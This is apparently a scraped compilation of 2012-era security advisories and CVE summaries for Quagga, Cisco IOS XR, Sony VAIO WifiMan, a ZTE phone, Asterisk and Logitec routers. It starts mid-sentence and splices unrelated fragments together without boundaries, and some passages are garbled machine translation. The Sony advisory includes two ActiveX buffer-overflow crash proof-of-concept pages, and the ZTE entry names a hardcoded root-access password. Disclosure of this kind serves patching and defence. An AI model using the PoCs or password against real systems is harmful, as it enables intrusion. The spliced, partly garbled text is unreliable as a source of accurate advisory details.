updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201310-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: quagga security update Advisory ID: RHSA-2012:1259-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-1259.html Issue date: 2012-09-12 CVE Names: CVE-2011-3323 CVE-2011-3324 CVE-2011-3325 CVE-2011-3326 CVE-2011-3327 CVE-2012-0249 CVE-2012-0250 CVE-2012-0255 CVE-2012-1820 ===================================================================== 1. Summary: Updated quagga packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 3. The Quagga ospfd and ospf6d daemons implement the OSPF (Open Shortest Path First) routing protocol. A heap-based buffer overflow flaw was found in the way the bgpd daemon processed malformed Extended Communities path attributes. An attacker could send a specially-crafted BGP message, causing bgpd on a target system to crash or, possibly, execute arbitrary code with the privileges of the user running bgpd. The UPDATE message would have to arrive from an explicitly configured BGP peer, but could have originated elsewhere in the BGP network. (CVE-2011-3327) A stack-based buffer overflow flaw was found in the way the ospf6d daemon processed malformed Link State Update packets. An OSPF router could use this flaw to crash ospf6d on an adjacent router. (CVE-2011-3323) A flaw was found in the way the ospf6d daemon processed malformed link state advertisements. An OSPF neighbor could use this flaw to crash ospf6d on a target system. (CVE-2011-3324) A flaw was found in the way the ospfd daemon processed malformed Hello packets. An OSPF neighbor could use this flaw to crash ospfd on a target system. (CVE-2011-3325) A flaw was found in the way the ospfd daemon processed malformed link state advertisements. An OSPF router in the autonomous system could use this flaw to crash ospfd on a target system. (CVE-2011-3326) An assertion failure was found in the way the ospfd daemon processed certain Link State Update packets. An OSPF router could use this flaw to cause ospfd on an adjacent router to abort. (CVE-2012-0249) A buffer overflow flaw was found in the way the ospfd daemon processed certain Link State Update packets. An OSPF router could use this flaw to crash ospfd on an adjacent router. (CVE-2012-0250) Two flaws were found in the way the bgpd daemon processed certain BGP OPEN messages. A configured BGP peer could cause bgpd on a target system to abort via a specially-crafted BGP OPEN message. (CVE-2012-0255, CVE-2012-1820) Red Hat would like to thank CERT-FI for reporting CVE-2011-3327, CVE-2011-3323, CVE-2011-3324, CVE-2011-3325, and CVE-2011-3326; and the CERT/CC for reporting CVE-2012-0249, CVE-2012-0250, CVE-2012-0255, and CVE-2012-1820. CERT-FI acknowledges Riku Hietamäki, Tuomo Untinen and Jukka Taimisto of the Codenomicon CROSS project as the original reporters of CVE-2011-3327, CVE-2011-3323, CVE-2011-3324, CVE-2011-3325, and CVE-2011-3326. The CERT/CC acknowledges Martin Winter at OpenSourceRouting.org as the original reporter of CVE-2012-0249, CVE-2012-0250, and CVE-2012-0255, and Denis Ovsienko as the original reporter of CVE-2012-1820. Users of quagga should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the bgpd, ospfd, and ospf6d daemons will be restarted automatically. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Package List: Red Hat Enterprise Linux Server (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/quagga-0.99.15-7.el6_3.2.src.rpm i386: quagga-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm ppc64: quagga-0.99.15-7.el6_3.2.ppc64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.ppc64.rpm s390x: quagga-0.99.15-7.el6_3.2.s390x.rpm quagga-debuginfo-0.99.15-7.el6_3.2.s390x.rpm x86_64: quagga-0.99.15-7.el6_3.2.x86_64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/quagga-0.99.15-7.el6_3.2.src.rpm i386: quagga-contrib-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm quagga-devel-0.99.15-7.el6_3.2.i686.rpm ppc64: quagga-contrib-0.99.15-7.el6_3.2.ppc64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.ppc.rpm quagga-debuginfo-0.99.15-7.el6_3.2.ppc64.rpm quagga-devel-0.99.15-7.el6_3.2.ppc.rpm quagga-devel-0.99.15-7.el6_3.2.ppc64.rpm s390x: quagga-contrib-0.99.15-7.el6_3.2.s390x.rpm quagga-debuginfo-0.99.15-7.el6_3.2.s390.rpm quagga-debuginfo-0.99.15-7.el6_3.2.s390x.rpm quagga-devel-0.99.15-7.el6_3.2.s390.rpm quagga-devel-0.99.15-7.el6_3.2.s390x.rpm x86_64: quagga-contrib-0.99.15-7.el6_3.2.x86_64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.x86_64.rpm quagga-devel-0.99.15-7.el6_3.2.i686.rpm quagga-devel-0.99.15-7.el6_3.2.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/quagga-0.99.15-7.el6_3.2.src.rpm i386: quagga-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm x86_64: quagga-0.99.15-7.el6_3.2.x86_64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/quagga-0.99.15-7.el6_3.2.src.rpm i386: quagga-contrib-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm quagga-devel-0.99.15-7.el6_3.2.i686.rpm x86_64: quagga-contrib-0.99.15-7.el6_3.2.x86_64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.x86_64.rpm quagga-devel-0.99.15-7.el6_3.2.i686.rpm quagga-devel-0.99.15-7.el6_3.2.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2011-3323.html https://www.redhat.com/security/data/cve/CVE-2011-3324.html https://www.redhat.com/security/data/cve/CVE-2011-3325.html https://www.redhat.com/security/data/cve/CVE-2011-3326.html https://www.redhat.com/security/data/cve/CVE-2011-3327.html https://www.redhat.com/security/data/cve/CVE-2012-0249.html https://www.redhat.com/security/data/cve/CVE-2012-0250.html https://www.redhat.com/security/data/cve/CVE-2012-0255.html https://www.redhat.com/security/data/cve/CVE-2012-1820.html https://access.redhat.com/security/updates/classification/#moderate 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFQUOxMXlSAg2UNWIIRAspnAKDCd5umtQIWFZYD8vyRPpCkAlgiwwCglw+g P4VSjxs4xRnVCtT/IOkBkKQ= =VtuC -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. ============================================================================ Ubuntu Security Notice USN-1605-1 October 11, 2012 quagga vulnerability ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.04 LTS - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.04 LTS Summary: Quagga could be made to crash if it received specially crafted network traffic. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 12.04 LTS: quagga 0.99.20.1-0ubuntu0.12.04.3 Ubuntu 11.10: quagga 0.99.20.1-0ubuntu0.11.10.3 Ubuntu 11.04: quagga 0.99.20.1-0ubuntu0.11.04.3 Ubuntu 10.04 LTS: quagga 0.99.20.1-0ubuntu0.10.04.3 After a standard system update you need to restart Quagga to make all the necessary changes

Cisco IOS XR before 4.2.1 on ASR 9000 series devices and CRS series devices allows remote attackers to cause a denial of service (packet transmission outage) via a crafted packet, aka Bug IDs CSCty94537 and CSCtz62593. The problem is Bug ID CSCty94537 and CSCtz62593 It is a problem.Denial of service operation via a packet crafted by a third party ( Stop packet transmission ) There is a possibility of being put into a state. Cisco IOS XR is a member of the Cisco IOS Software family that uses a microkernel-based operating system architecture. On the Processor (PRP). The attacker can send a specially-made packet to the affected system, causing the packet originating from the route processor CPU to stop transmitting to the fabric, and finally triggering the denial of service attack. This issue is being tracked by Cisco Bug IDs CSCty94537 (ASR 9000) and CSCtz62593 (CRS). ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Cisco IOS XR Denial of Service Vulnerability SECUNIA ADVISORY ID: SA49329 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49329/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49329 RELEASE DATE: 2012-05-31 DISCUSS ADVISORY: http://secunia.com/advisories/49329/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49329/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49329 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Cisco IOS XR, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an unspecified error when processing certain packets and can be exploited to stop outbound packets from being transmitted via specially crafted packets sent to a configured address on the device. NOTE: Transit traffic packets do not trigger this vulnerability. Please see the vendor's advisory for the list of affected products and versions. SOLUTION: Apply updates. Please see the vendor's advisory for more information. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120530-iosxr OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple buffer overflows in the Wireless Manager ActiveX control 4.0.0.0 in WifiMan.dll in Sony VAIO PC Wireless LAN Wizard 1.0; VAIO Wireless Wizard 1.00, 1.00_64, 1.0.1, 2.0, and 3.0; SmartWi Connection Utility 4.7, 4.7.4, 4.8, 4.9, 4.10, and 4.11; and VAIO Easy Connect software 1.0.0 and 1.1.0 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long string in the second argument of the (1) SetTmpProfileOption or (2) ConnectToNetwork method. Sony VAIO Wireless Manager ActiveX control ('WifiMan.dll') is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Attackers may exploit these issues to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions. Sony VAIO Wireless Manager 4.0.0.0 is vulnerable; prior versions may also be affected. Sony VAIO is a computer system produced by Sony Corporation. If the attack fails, it will result in a denial of service. Advisory ID: HTB23063 Product: Wireless Manager Sony VAIO Vendor: Sony Computers Vulnerable Version(s): 4.0.0.0 and probably prior Tested Version: 4.0.0.0 Vendor Notification: 7 December 2011 Vendor Patch: 20 January 2012 Public Disclosure: 30 May 2012 Vulnerability Type: Buffer Overflow CVE Reference: CVE-2012-0985 Solution Status: Fixed by Vendor Risk Level: High Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge SA Security Research Lab has discovered 2 buffer overflow vulnerabilities in Wireless Manager Sony VAIO which can be exploited to execute arbitrary code on vulnerable system. 1) Buffer Overflow in Wireless Manager Sony VAIO: CVE-2012-0985 1.1 The method SetTmpProfileOption() in WifiMan.dll library does not properly check the length of string parameters. The following PoC will crash the application: <HTML> <BODY> <object id=ctrl classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object> <SCRIPT> function Do_() { arg1=1 arg2=String(8212, "X") arg3="defaultV" SetTmpProfileOption arg1 ,arg2 ,arg3 } </SCRIPT> <input language=JavaScript onclick=Do_() type=button value="Sony_POC"> </BODY> </HTML> 1.2 The method ConnectToNetwork() in WifiMan.dll library does not properly check the length of string parameters. The following PoC will crash the application: <HTML> <BODY> <object id=ctrl classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object> <SCRIPT> function Do_() { arg1=1 arg2=String(6164, "X") target.ConnectToNetwork arg1 ,arg2 } </SCRIPT> <input language=JavaScript onclick=Do_() type=button value="Sony_POC"> </BODY> </HTML> ----------------------------------------------------------------------------------------------- Solution: Sony has released a security update for the Affected Models that resolves this issue. Sony recommends that all customers who have Affected Models immediately install the latest version of the software by using VAIO Update. Note: If you are using the default VAIO Update settings the update will be installed automatically. More information and security update: <a href="http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946" target="_blank">http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946</a> ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23063 - https://www.htbridge.com/advisory/HTB23063 - Buffer Overflow in Wireless Manager Sony VAIO. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Sony VAIO WifiMan ActiveX Control Two Buffer Overflow Vulnerabilities SECUNIA ADVISORY ID: SA49340 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49340/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49340 RELEASE DATE: 2012-06-01 DISCUSS ADVISORY: http://secunia.com/advisories/49340/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49340/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49340 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: High-Tech Bridge SA has reported two vulnerabilities in Sony VAIO WifiMan ActiveX Control, which can be exploited by malicious people to compromise a user's system. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. PROVIDED AND/OR DISCOVERED BY: High-Tech Bridge SA ORIGINAL ADVISORY: Sony: http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946 High-Tech Bridge SA: https://www.htbridge.com/advisory/HTB23063 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The ZTE sync_agent program for Android 2.3.4 on the Score M device uses a hardcoded ztex1609523 password to control access to commands, which allows remote attackers to gain privileges via a crafted application. ZTE Score M is an Android smartphone. ZTE Score M is prone to a security-bypass vulnerability caused by a hard-coded password. An attacker can exploit this issue by enticing an unsuspecting victim to install a malicious application on the device. Successful attacks can allow a remote attacker to gain unauthorized root access to the vulnerable device. The vulnerability stems from the use of a hardcoded ztex1609523 password to control access to commands

chan_skinny.c in the Skinny (aka SCCP) channel driver in Certified Asterisk 1.8.11-cert before 1.8.11-cert2 and Asterisk Open Source 1.8.x before 1.8.12.1 and 10.x before 10.4.1 allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) by closing a connection in off-hook mode. Asterisk is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to trigger a NULL-pointer dereference and cause a system crash, denying service to legitimate users. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201206-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Asterisk: Multiple vulnerabilities Date: June 21, 2012 Bugs: #413353, #418189, #418191 ID: 201206-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Asterisk might allow remote attackers to execute arbitrary code. Background ========== Asterisk is an open source telephony engine and toolkit. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/asterisk < 1.8.12.1 >= 1.8.12.1 Description =========== Multiple vulnerabilities have been found in Asterisk: * An error in manager.c allows shell access through the MixMonitor application, GetVar, or Status (CVE-2012-2414). * An error in chan_skinny.c could cause a heap-based buffer overflow (CVE-2012-2415). * An error in chan_sip.c prevents Asterisk from checking if a channel exists before connected line updates (CVE-2012-2416). * An error in chan_iax2.c may cause an invalid pointer to be called (CVE-2012-2947). * chan_skinny.c contains a NULL pointer dereference (CVE-2012-2948). Impact ====== A remote attacker could execute arbitrary code with the privileges of the process or cause a Denial of Service condition. Workaround ========== There is no known workaround at this time. Resolution ========== All Asterisk users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/asterisk-1.8.12.1" References ========== [ 1 ] CVE-2012-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2414 [ 2 ] CVE-2012-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2415 [ 3 ] CVE-2012-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2416 [ 4 ] CVE-2012-2947 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2947 [ 5 ] CVE-2012-2948 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2948 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201206-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . When an SCCP client closes its connection to the server, a pointer in a structure is set to Null. If the client was not in the on-hook state at the time the connection was closed, this pointer is later dereferenced. "Off hook") to crash the server. Successful exploitation of this vulnerability would result in termination of the server, causing denial of service to legitimate users." Resolution The pointer to the device in the structure is now checked before it is dereferenced in the channel event callbacks and message handling functions. Affected Versions Product Release Series Asterisk Open Source 1.8.x All Versions Asterisk Open Source 10.x All Versions Certified Asterisk 1.8.11-cert 1.8.11-cert1 Corrected In Product Release Asterisk Open Source 1.8.12.1, 10.4.1 Certified Asterisk 1.8.11-cert2 Patches SVN URL Revision http://downloads.asterisk.org/pub/security/AST-2012-008-1.8.diff v1.8 http://downloads.asterisk.org/pub/security/AST-2012-008-10.diff v10 http://downloads.asterisk.org/pub/security/AST-2012-008-1.8.11-cert.diff v1.8.11-cert Links https://issues.asterisk.org/jira/browse/ASTERISK-19905 Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2012-008.pdf and http://downloads.digium.com/pub/security/AST-2012-008.html Revision History Date Editor Revisions Made 05/25/2012 Matt Jordan Initial Release Asterisk Project Security Advisory - AST-2012-008 Copyright (c) 2012 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. _______________________________________________ Full-Disclosure - We believe in it. In addition, it was discovered that Asterisk does not set the alwaysauthreject option by default in the SIP channel driver. This allows remote attackers to observe a difference in response behavior and check for the presence of account names. (CVE-2011-2666) System administrators concerned by this user enumerating vulnerability should enable the alwaysauthreject option in the configuration. We do not plan to change the default setting in the stable version (Asterisk 1.6) in order to preserve backwards compatibility. For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 1:1.8.13.0~dfsg-1. We recommend that you upgrade your asterisk packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJP15u9AAoJEL97/wQC1SS+Pu0H/0ZPFRSNpL+hJKd7b5FGF6al BZSp51eAC0d2mEFWMml4DAvx6u1gMPzrO9PPNgsEc6gxNyD4Stj+rF54h6X5i5NR ZSlyeQTQ292J18+LdANYWwxQJyzNNthNmYL/2AiR6z2BRnD3ZqHiPbWGv0FV4Vyw rT8fZ7ujp7CQlFGwcqjPxUzBqEq5U2raN2K9BoP6zpu8mHf9WzcmL4KZR/wJxMkf 04McrMttF++gM3atFSSXCWC5Bpj8q0xpr3YIv0dI8+fWPFpevNX2MBM+diS06iNc PUWfCPTy2Psl46dC3J+JeF8TPWE/HCmV98DD54DEv0R1tPUmNm362dtfiutiBbQ= =Wy1e -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Asterisk Two Denial of Service Vulnerabilities SECUNIA ADVISORY ID: SA49303 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49303/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49303 RELEASE DATE: 2012-05-30 DISCUSS ADVISORY: http://secunia.com/advisories/49303/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49303/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49303 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in Asterisk, which can be exploited by malicious people to cause a DoS (Denial of Service). 1) An error in IAX2 channel driver within the "handle_request_update()" function (channels/chan_sip.c) when placing an established call on hold can be exploited to cause a crash via specially crafted packets. Successful exploitation of this vulnerability requires that the setting mohinterpret=passthrough is set and that the call is placed on hold without a suggested music-on-hold class name. 2) An error in SCCP (Skinny) channel driver (channels/chan_skinny.c) when handling termination of a client's connection can be exploited to cause a crash by closing a connection to the server in certain call states. The vulnerabilities are reported in versions 1.8.11-cert prior to 1.8.11-cert2, 1.8.x prior to 1.8.12.1, and 10.x prior to 10.4.1. SOLUTION: Update to a fixed version. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) mgrobecker 2) Christoph Hebeisen ORIGINAL ADVISORY: http://downloads.asterisk.org/pub/security/AST-2012-007.html http://downloads.asterisk.org/pub/security/AST-2012-008.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Logitec LAN-W300N/R routers with firmware before 2.27 do not properly restrict login access, which allows remote attackers to obtain administrative privileges and modify settings via vectors related to PPPoE authentication. Logitec LAN-W300N/R series contain an issue where access permissions are not restricted. The LAN-W300N/R series are wireless LAN routers. Logitec LAN-W300N/R series contain an issue where access permissions are not restricted. Jin Sawada, Keisuke Okazaki, Naoto Katsumi of Security Engineering Laboratory, IT Security Center(ISEC), IPA reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.An attacker that can access the product may log in with administrative privileges. As a result, settings may be changed or altered by the attacker who logged in to LAN-W300N/R. Multiple Logitec LAN-W300N products are prone to a security-bypass vulnerability. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) of the application using the library. For more information: SA49116 SOLUTION: Apply updated packages via the zypper package manager. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Logitec LAN-W300N Multiple Products Security Bypass Vulnerability SECUNIA ADVISORY ID: SA49289 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49289/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49289 RELEASE DATE: 2012-05-25 DISCUSS ADVISORY: http://secunia.com/advisories/49289/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49289/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS 